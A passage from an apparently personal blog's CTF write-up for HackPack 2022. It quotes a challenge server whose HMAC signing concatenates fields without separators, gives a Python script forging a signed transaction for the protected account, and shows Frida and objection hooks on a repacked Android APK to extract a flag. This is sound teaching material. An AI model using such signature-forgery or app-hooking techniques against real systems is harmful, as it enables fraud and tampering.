</span></span><span class=line><span class=cl>                <span class=s2>&#34;num_tuco&#34;</span><span class=p>:</span> <span class=bp>self</span><span class=o>.</span><span class=n>num_tuco</span><span class=p>,</span>
</span></span><span class=line><span class=cl>            <span class=p>},</span>
</span></span><span class=line><span class=cl>            <span class=s2>&#34;auth_tag&#34;</span><span class=p>:</span> <span class=n>hmac</span><span class=o>.</span><span class=n>new</span><span class=p>(</span><span class=n>secret_key</span><span class=p>,</span> <span class=bp>self</span><span class=o>.</span><span class=n>serialize</span><span class=p>(),</span> <span class=s2>&#34;sha256&#34;</span><span class=p>)</span><span class=o>.</span><span class=n>hexdigest</span><span class=p>(),</span>
</span></span><span class=line><span class=cl>        <span class=p>})</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>class</span> <span class=nc>CertifiedBalance</span><span class=p>(</span><span class=n>BaseModel</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>balance</span><span class=p>:</span> <span class=n>Balance</span>
</span></span><span class=line><span class=cl>    <span class=n>auth_tag</span><span class=p>:</span> <span class=nb>str</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>verify</span><span class=p>(</span><span class=bp>self</span><span class=p>,</span> <span class=n>secret_key</span><span class=p>:</span> <span class=nb>bytes</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>Balance</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>recreate_auth_tag</span> <span class=o>=</span> <span class=bp>self</span><span class=o>.</span><span class=n>balance</span><span class=o>.</span><span class=n>sign</span><span class=p>(</span><span class=n>secret_key</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=n>hmac</span><span class=o>.</span><span class=n>compare_digest</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>auth_tag</span><span class=p>,</span> <span class=n>recreate_auth_tag</span><span class=o>.</span><span class=n>auth_tag</span><span class=p>):</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=bp>self</span><span class=o>.</span><span class=n>balance</span>
</span></span><span class=line><span class=cl>        <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=k>raise</span> <span class=ne>ValueError</span><span class=p>(</span><span class=s2>&#34;invalid certified balance&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>class</span> <span class=nc>Transaction</span><span class=p>(</span><span class=n>BaseModel</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>from_acct</span><span class=p>:</span> <span class=nb>int</span>
</span></span><span class=line><span class=cl>    <span class=n>to_acct</span><span class=p>:</span> <span class=nb>int</span>
</span></span><span class=line><span class=cl>    <span class=n>num_tuco</span><span class=p>:</span> <span class=nb>float</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>serialize</span><span class=p>(</span><span class=bp>self</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=nb>bytes</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=p>(</span><span class=nb>str</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>from_acct</span><span class=p>)</span> <span class=o>+</span> <span class=nb>str</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>to_acct</span><span class=p>)</span> <span class=o>+</span> <span class=nb>str</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>num_tuco</span><span class=p>))</span><span class=o>.</span><span class=n>encode</span><span class=p>()</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>sign</span><span class=p>(</span><span class=bp>self</span><span class=p>,</span> <span class=n>secret_key</span><span class=p>:</span> <span class=nb>bytes</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>AuthenticatedTransaction</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>tuco_smash</span> <span class=o>=</span> <span class=bp>self</span><span class=o>.</span><span class=n>serialize</span><span class=p>()</span>
</span></span><span class=line><span class=cl>        <span class=n>tuco_hash</span> <span class=o>=</span> <span class=n>hmac</span><span class=o>.</span><span class=n>new</span><span class=p>(</span><span class=n>secret_key</span><span class=p>,</span> <span class=n>tuco_smash</span><span class=p>,</span> <span class=s2>&#34;sha256&#34;</span><span class=p>)</span><span class=o>.</span><span class=n>hexdigest</span><span class=p>()</span>
</span></span><span class=line><span class=cl>        
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>CertifiedTransaction</span><span class=o>.</span><span class=n>parse_obj</span><span class=p>({</span>
</span></span><span class=line><span class=cl>            <span class=s2>&#34;transaction&#34;</span><span class=p>:</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>                <span class=s2>&#34;from_acct&#34;</span><span class=p>:</span> <span class=bp>self</span><span class=o>.</span><span class=n>from_acct</span><span class=p>,</span>
</span></span><span class=line><span class=cl>                <span class=s2>&#34;to_acct&#34;</span><span class=p>:</span> <span class=bp>self</span><span class=o>.</span><span class=n>to_acct</span><span class=p>,</span>
</span></span><span class=line><span class=cl>                <span class=s2>&#34;num_tuco&#34;</span><span class=p>:</span> <span class=bp>self</span><span class=o>.</span><span class=n>num_tuco</span>
</span></span><span class=line><span class=cl>            <span class=p>},</span>
</span></span><span class=line><span class=cl>            <span class=s2>&#34;auth_tag&#34;</span><span class=p>:</span> <span class=n>tuco_hash</span><span class=p>,</span>
</span></span><span class=line><span class=cl>        <span class=p>})</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>class</span> <span class=nc>CertifiedTransaction</span><span class=p>(</span><span class=n>BaseModel</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>transaction</span><span class=p>:</span> <span class=n>Transaction</span>
</span></span><span class=line><span class=cl>    <span class=n>auth_tag</span><span class=p>:</span> <span class=nb>str</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>def</span> <span class=nf>verify</span><span class=p>(</span><span class=bp>self</span><span class=p>,</span> <span class=n>secret_key</span><span class=p>:</span> <span class=nb>bytes</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>Transaction</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>recreated</span> <span class=o>=</span> <span class=bp>self</span><span class=o>.</span><span class=n>transaction</span><span class=o>.</span><span class=n>sign</span><span class=p>(</span><span class=n>secret_key</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=n>hmac</span><span class=o>.</span><span class=n>compare_digest</span><span class=p>(</span><span class=bp>self</span><span class=o>.</span><span class=n>auth_tag</span><span class=p>,</span> <span class=n>recreated</span><span class=o>.</span><span class=n>auth_tag</span><span class=p>):</span>
</span></span><span class=line><span class=cl>            <span class=k>return</span> <span class=bp>self</span><span class=o>.</span><span class=n>transaction</span>
</span></span><span class=line><span class=cl>        <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=k>raise</span> <span class=ne>ValueError</span><span class=p>(</span><span class=s2>&#34;invalid authenticated transaction&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@app.get</span><span class=p>(</span><span class=s1>&#39;/&#39;</span><span class=p>,</span> <span class=n>include_in_schema</span><span class=o>=</span><span class=kc>False</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>home</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>RedirectResponse</span><span class=p>(</span><span class=s2>&#34;app/index.html&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=nd>@app.get</span><span class=p>(</span><span class=s1>&#39;/robots.txt&#39;</span><span class=p>,</span> <span class=n>include_in_schema</span><span class=o>=</span><span class=kc>False</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>robots</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>RedirectResponse</span><span class=p>(</span><span class=s2>&#34;app/robots.txt&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># Returns type CertifiedBalance ; Takes Int</span>
</span></span><span class=line><span class=cl><span class=nd>@app.post</span><span class=p>(</span><span class=s2>&#34;/api/account/claim&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>async</span> <span class=k>def</span> <span class=nf>account_claim</span><span class=p>(</span><span class=n>acct_num</span><span class=p>:</span> <span class=nb>int</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>CertifiedBalance</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>acct_num</span> <span class=o>==</span> <span class=n>TUCO_ACCT_NUM</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>raise</span> <span class=n>HTTPException</span><span class=p>(</span><span class=n>status_code</span><span class=o>=</span><span class=mi>400</span><span class=p>,</span> <span class=n>detail</span><span class=o>=</span><span class=s2>&#34;That&#39;s Tuco&#39;s account number! Don&#39;t make Tuco mad!&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    
</span></span><span class=line><span class=cl>    <span class=n>balance</span> <span class=o>=</span> <span class=n>Balance</span><span class=o>.</span><span class=n>parse_obj</span><span class=p>({</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;acct_num&#34;</span><span class=p>:</span> <span class=n>acct_num</span><span class=p>,</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;num_tuco&#34;</span><span class=p>:</span> <span class=n>math</span><span class=o>.</span><span class=n>pi</span><span class=p>,</span>
</span></span><span class=line><span class=cl>    <span class=p>})</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>balance</span><span class=o>.</span><span class=n>sign</span><span class=p>(</span><span class=n>SECRET_KEY</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># Returns type Certified Transaction; Takes Transaction</span>
</span></span><span class=line><span class=cl><span class=nd>@app.post</span><span class=p>(</span><span class=s2>&#34;/api/transaction/certify&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>async</span> <span class=k>def</span> <span class=nf>transaction_certify</span><span class=p>(</span><span class=n>transaction</span><span class=p>:</span> <span class=n>Transaction</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=n>CertifiedTransaction</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>transaction</span><span class=o>.</span><span class=n>from_acct</span> <span class=o>==</span> <span class=n>TUCO_ACCT_NUM</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>raise</span> <span class=n>HTTPException</span><span class=p>(</span><span class=n>status_code</span><span class=o>=</span><span class=mi>400</span><span class=p>,</span> <span class=n>detail</span><span class=o>=</span><span class=s2>&#34;Ha! You think you can steal from Tuco so easily?!!&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>transaction</span><span class=o>.</span><span class=n>sign</span><span class=p>(</span><span class=n>SECRET_KEY</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># Returns type String ; takes Certified Transcation (WE WILL GET OUR FLAG HERE)</span>
</span></span><span class=line><span class=cl><span class=nd>@app.post</span><span class=p>(</span><span class=s2>&#34;/api/transaction/commit&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=k>async</span> <span class=k>def</span> <span class=nf>transaction_commit</span><span class=p>(</span><span class=n>certified_transaction</span><span class=p>:</span> <span class=n>CertifiedTransaction</span><span class=p>)</span> <span class=o>-&gt;</span> <span class=nb>str</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=n>transaction</span> <span class=o>=</span> <span class=n>certified_transaction</span><span class=o>.</span><span class=n>verify</span><span class=p>(</span><span class=n>SECRET_KEY</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>transaction</span><span class=o>.</span><span class=n>from_acct</span> <span class=o>!=</span> <span class=n>TUCO_ACCT_NUM</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=s2>&#34;OK&#34;</span>
</span></span><span class=line><span class=cl>    <span class=k>else</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>return</span> <span class=n>FLAG</span>
</span></span></code></pre></div><p>Here we can look in the function transaction.sign (line:67), the tuco_smash varible calls self.serialize.
In this function we can notice that for the generation of auth token, the app appends <code>from_acct</code> , <code>to_acct</code> and <code>num_tuco</code> <em>without any seperator</em></p><p>This part is important, because without any seperator we can create the auth token for the user tuco by manipulating values.
Since the app appends the values without a seperator we can bypass the tuco account check by</p><p><code>&lt;first half of tuco's account number> + &lt;second half of tuco's account number> + num tuco</code></p><p>this will generate the auth-token, which we can use to &ldquo;commit&rdquo; as tuco&rsquo;s account number.</p><p>From source code we can deduce that to get the flag we must call <code>/api/transaction/commit</code> with tuco&rsquo;s account number and a valid hash to get the flag</p><p>The &ldquo;from_acct&rdquo; param and the &ldquo;to_acct&rdquo; param combine to form tuco&rsquo;s account number and the final string that will be generated - 31415926512
<img src=/images/hackpack2022/Pasted%20image%2020220411113258.png alt></p><p>Using the same auth token from the last response in this request
All the params combine to form the same string as the previous request. i.e 31415926512
<img src=/images/hackpack2022/Pasted%20image%2020220411113313.png alt></p><p>Here is an automated python script to do the same</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>import</span> <span class=nn>json</span>
</span></span><span class=line><span class=cl><span class=kn>import</span> <span class=nn>requests</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>url</span> <span class=o>=</span> <span class=s1>&#39;https://tuplecoin.cha.hackpack.club/&#39;</span>
</span></span><span class=line><span class=cl><span class=n>tuco</span> <span class=o>=</span> <span class=mi>314159265</span>
</span></span><span class=line><span class=cl><span class=n>headers</span> <span class=o>=</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;Content-Type&#34;</span><span class=p>:</span><span class=s2>&#34;application/json&#34;</span>
</span></span><span class=line><span class=cl>        <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>data</span> <span class=o>=</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;from_acct&#34;</span> <span class=p>:</span> <span class=nb>int</span><span class=p>(</span><span class=nb>str</span><span class=p>(</span><span class=n>tuco</span><span class=p>)[:</span><span class=o>-</span><span class=mi>2</span><span class=p>]),</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;to_acct&#34;</span> <span class=p>:</span> <span class=nb>int</span><span class=p>(</span><span class=nb>str</span><span class=p>(</span><span class=n>tuco</span><span class=p>)[</span><span class=o>-</span><span class=mi>2</span><span class=p>:]),</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;num_tuco&#34;</span> <span class=p>:</span> <span class=mi>12</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>r</span> <span class=o>=</span> <span class=n>requests</span><span class=o>.</span><span class=n>post</span><span class=p>(</span><span class=n>url</span> <span class=o>+</span> <span class=s1>&#39;api/transaction/certify&#39;</span> <span class=p>,</span><span class=n>json</span> <span class=o>=</span> <span class=n>data</span> <span class=p>,</span>  <span class=n>headers</span> <span class=o>=</span> <span class=n>headers</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>j</span> <span class=o>=</span> <span class=n>json</span><span class=o>.</span><span class=n>loads</span><span class=p>(</span><span class=n>r</span><span class=o>.</span><span class=n>text</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>auth</span> <span class=o>=</span> <span class=n>j</span><span class=p>[</span><span class=s2>&#34;auth_tag&#34;</span><span class=p>]</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>exploit</span> <span class=o>=</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;transaction&#34;</span><span class=p>:{</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;from_acct&#34;</span><span class=p>:</span> <span class=n>tuco</span><span class=p>,</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;to_acct&#34;</span><span class=p>:</span><span class=mi>1</span><span class=p>,</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;num_tuco&#34;</span><span class=p>:</span><span class=mi>2</span>
</span></span><span class=line><span class=cl>        <span class=p>},</span>
</span></span><span class=line><span class=cl>        <span class=s2>&#34;auth_tag&#34;</span><span class=p>:</span> <span class=n>auth</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>r</span> <span class=o>=</span> <span class=n>requests</span><span class=o>.</span><span class=n>post</span><span class=p>(</span><span class=n>url</span> <span class=o>+</span> <span class=s1>&#39;api/transaction/commit&#39;</span> <span class=p>,</span> <span class=n>json</span> <span class=o>=</span> <span class=n>exploit</span> <span class=p>,</span> <span class=n>headers</span> <span class=o>=</span> <span class=n>headers</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=nb>print</span><span class=p>(</span><span class=n>r</span><span class=o>.</span><span class=n>text</span><span class=p>)</span>
</span></span></code></pre></div><p>output</p><p><img src=/images/hackpack2022/Pasted%20image%2020220411114235.png alt></p><hr><h2 id=rev-3t-3nd-ur-hom3>Rev: 3T 3ND UR HOM3</h2><p>This was an android challenge. We get an apk so we boot up an android emulator .</p><p>Unpacking the APK and editing AndroidManifest.xml to change the minimum android api version required to 23 (idk it was not working on my emulator, had to do this)
<img src=/images/hackpack2022/Pasted%20image%2020220411204608.png alt></p><p>Repacking the apk.</p><p><img src=/images/hackpack2022/Pasted%20image%2020220411205604.png alt></p><p>Signing the apk</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>keytool -genkey -keystore test.keystore -alias alias_name -keyalg RSA -keysize <span class=m>2048</span> -validity <span class=m>10000</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name
</span></span></code></pre></div><p>Now we install the apk</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>adb install modded.apk
</span></span></code></pre></div><p><img src=/images/hackpack2022/Pasted%20image%2020220412000639.png alt></p><p>Now we have our environment set up, we can now proceed with source code analysis</p><p>Viewing source code by Jadx.</p><p><img src=/images/hackpack2022/Pasted%20image%2020220412001138.png alt></p><p>This is the main function of the android app. On line 38 we can see the apk calling a method <code>c</code> of the class <code>qg</code> (since qgVar is object of qg). Let&rsquo;s inspect this method.</p><p><img src=/images/hackpack2022/Pasted%20image%2020220412002648.png alt></p><p>The method <code>c</code> returns some string value, we can hook this method and see it&rsquo;s return value. This will give us the flag most probably.</p><p>So to do this, there are two ways</p><h3 id=the-skiddie-way--using-objection>The Skiddie Way : Using Objection</h3><p>Using <a href=https://github.com/sensepost/objection>objection</a> we can check for classes and find the return value for the same.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>objection -g com.hackpack.et explore
</span></span></code></pre></div><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>android hooking watch class_method qg.c --dump-return
</span></span></code></pre></div><p>Now entering any text inside the textbox will call the function and give us the flag</p><p><img src=/images/hackpack2022/Pasted%20image%2020220412003202.png alt></p><h3 id=pro-way-manual-function-override-using-frida>Pro Way: Manual function override using frida.</h3><p>We know which class we have to hook, so creating a custom frida script for the same</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-js data-lang=js><span class=line><span class=cl><span class=nx>Java</span><span class=p>.</span><span class=nx>perform</span><span class=p>(</span><span class=kd>function</span><span class=p>(){</span>
</span></span><span class=line><span class=cl>  <span class=nx>Java</span><span class=p>.</span><span class=nx>use</span><span class=p>(</span><span class=s2>&#34;qg&#34;</span><span class=p>).</span><span class=nx>c</span><span class=p>.</span><span class=nx>implementation</span> <span class=o>=</span> <span class=kd>function</span> <span class=p>(</span><span class=nx>a</span> <span class=p>,</span> <span class=nx>b</span><span class=p>)</span> <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nx>console</span><span class=p>.</span><span class=nx>log</span><span class=p>(</span><span class=s2>&#34;Exploit Loaded&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=kd>var</span> <span class=nx>retVal</span> <span class=o>=</span> <span class=k>this</span><span class=p>.</span><span class=nx>c</span><span class=p>(</span><span class=nx>a</span> <span class=p>,</span> <span class=nx>b</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nx>console</span><span class=p>.</span><span class=nx>log</span><span class=p>(</span><span class=nx>retVal</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=nx>retVal</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>});</span>
</span></span></code></pre></div><p>The above scripts overloads the function <code>qg.c</code> and then prints it&rsquo;s return value.</p><p>Now running this on frida</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>frida -U -j exploit.js com.hackpack.et --no-pause
</span></span></code></pre></div><p>Again entering text on the text box will print the flag for the challenge</p><p><img src=/images/hackpack2022/Pasted%20image%2020220412002311.png alt></p><hr><h2 id=conclusion>Conclusion</h2><p>I hope you all learned something from this writeup. If you feel that this could be improved, feel free to <a href=mailto:sec.ev1lm0rty@gmail.com>mail me</a>.
Thankyou HackPack team for this wonderful CTF.</p></div></article></main></div><footer class=footer><span class=footer_item></span>&nbsp;<div class=footer_social-icons><a href=https://github.com/ev1lm0rty target=_blank rel="noopener noreferrer me" title=Github><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37.0 00-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44.0 0020 4.77 5.07 5.07.0 0019.91 1S18.73.65 16 2.48a13.38 13.38.0 00-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07.0 005 4.77 5.44 5.44.0 003.5 8.55c0 5.42 3.3 6.61 6.44 7A3.37 3.37.0 009 18.13V22"/></svg>
</a><a href=https://www.linkedin.com/in/iamshubhamarya8 target=_blank rel="noopener noreferrer me" title=Linkedin><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M16 8a6 6 0 016 6v7h-4v-7a2 2 0 00-2-2 2 2 0 00-2 2v7h-4v-7a6 6 0 016-6z"/><rect x="2" y="9" width="4" height="12"/><circle cx="4" cy="4" r="2"/></svg>
</a><a href=https://twitter.com/ev1lm0rtyy target=_blank rel="noopener noreferrer me" title=Twitter><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M23 3a10.9 10.9.0 01-3.14 1.53 4.48 4.48.0 00-7.86 3v1A10.66 10.66.0 013 4s-4 9 5 13a11.64 11.64.0 01-7 2c9 5 20 0 20-11.5a4.5 4.5.0 00-.08-.83A7.72 7.72.0 0023 3z"/></svg>
</a><a href=https://reddit.com/user/iamnobody_8 target=_blank rel="noopener noreferrer me" title=Reddit><svg viewBox="0 0 24 24" fill="currentColor" stroke="none" stroke-width="1"><path d="M24 11.779c0-1.459-1.192-2.645-2.657-2.645-.715.0-1.363.286-1.84.746-1.81-1.191-4.259-1.949-6.971-2.046l1.483-4.669 4.016.941-.006.058c0 1.193.975 2.163 2.174 2.163 1.198.0 2.172-.97 2.172-2.163S21.396 2 20.199 2c-.92.0-1.704.574-2.021 1.379l-4.329-1.015c-.189-.046-.381.063-.44.249L11.755 7.82c-2.838.034-5.409.798-7.3 2.025-.474-.438-1.103-.712-1.799-.712-1.465.0-2.656 1.187-2.656 2.646.0.97.533 1.811 1.317 2.271-.052.282-.086.567-.086.857C1.231 18.818 6.039 22 11.95 22s10.72-3.182 10.72-7.093c0-.274-.029-.544-.075-.81.832-.447 1.405-1.312 1.405-2.318zM6.776 13.595c0-.868.71-1.575 1.582-1.575s1.581.707 1.581 1.575-.709 1.574-1.581 1.574-1.582-.706-1.582-1.574zm9.061 4.669c-.797.793-2.048 1.179-3.824 1.179L12 19.44l-.013.003c-1.777.0-3.028-.386-3.824-1.179-.145-.144-.145-.379.0-.523.145-.145.381-.145.526.0.65.647 1.729.961 3.298.961l.013.003.013-.003c1.569.0 2.648-.315 3.298-.962.145-.145.381-.144.526.0.145.145.145.379.0.524zm-.189-3.095c-.872.0-1.581-.706-1.581-1.574s.709-1.575 1.581-1.575 1.581.707 1.581 1.575-.709 1.574-1.581 1.574z"/></svg>
</a><a href=mailto:sec.ev1lm0rty@gmail.com target=_blank rel="noopener noreferrer me" title=Email><svg viewBox="0 0 24 21" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 4h16c1.1.0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1.0-2-.9-2-2V6c0-1.1.9-2 2-2z"/><polyline points="22,6 12,13 2,6"/></svg>
</a><a href=/index.xml target=_blank rel="noopener noreferrer me" title=Rss><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M4 11a9 9 0 019 9"/><path d="M4 4a16 16 0 0116 16"/><circle cx="5" cy="19" r="1"/></svg></a></div><small class=footer_copyright>© 2026 Shubham Arya.
Powered by <a href=https://github.com/hugo-sid/hugo-blog-awesome target=_blank rel=noopener>Hugo blog awesome</a>.</small></footer><a href=# title="Go to top" id=totop><svg width="48" height="48" fill="currentColor" stroke="currentColor" viewBox="0 96 960 960"><path d="M283 704.739 234.261 656 480 410.261 725.739 656 677 704.739l-197-197-197 197z"/></svg>
</a><script src=https://ev1lm0rty.com/js/main.min.35f435a5d8eac613c52daa28d8af544a4512337d3e95236e4a4978417b8dcb2f.js integrity="sha256-NfQ1pdjqxhPFLaoo2K9USkUSM30+lSNuSkl4QXuNyy8="></script></body></html>